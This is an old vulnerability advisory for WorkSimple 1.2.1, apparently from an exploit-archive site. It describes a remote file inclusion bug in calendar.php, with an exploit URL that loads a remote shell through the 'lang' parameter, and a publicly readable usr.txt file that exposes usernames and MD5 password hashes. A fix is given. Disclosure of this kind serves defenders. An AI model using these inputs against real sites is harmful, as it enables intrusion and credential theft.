WorkSimple 1.2.1 RFI / Sensitive Data Disclosure Vulnerabilities

2009.01.02
Credit: Osirys
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

[START] ######################################################################################### [0x01] Informations: Script : WorkSimple 1.2.1 Download : http://www.hotscripts.com/jump.php?listing_id=85112&jump_type=1 Vulnerability : Remote File Inclusion / Sensitive Data Disclosure Author : Osirys Contact : osirys[at]live[dot]it Notes : Proud to be Italian Greets: : XaDoS, x0r, emgent, Jay ######################################################################################### [0x02] Bug:[Remote File Inclusion] ###### Bugged file is: /[path]/calendar.php [CODE] <?PHP require 'data/conf.php'; //Include the global config ?> <?php include("$lang") ?> [/CODE] $lang variable is not declared, I thought it was declared on conf.php, but it's not. So we can set the $lang value directly from GET. FIX : Just declare $lang, for example in /[path]/data/conf.php [!] EXPLOIT: /[path]/calendar.php?lang=[remote_txt_shell] ######################################################################################## [0x03] Bug:[Sensitive Data Disclosure] ###### In this cms, when an user register himself, the cms puts informations like username and password on a .txt file. So, just going on it, we can get sensitive data like username and passoword. username:md5_hash [!] EXPLOIT: /[path]/data/usr.txt ######################################################################################### [/END]

References:

http://osvdb.org/50726


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top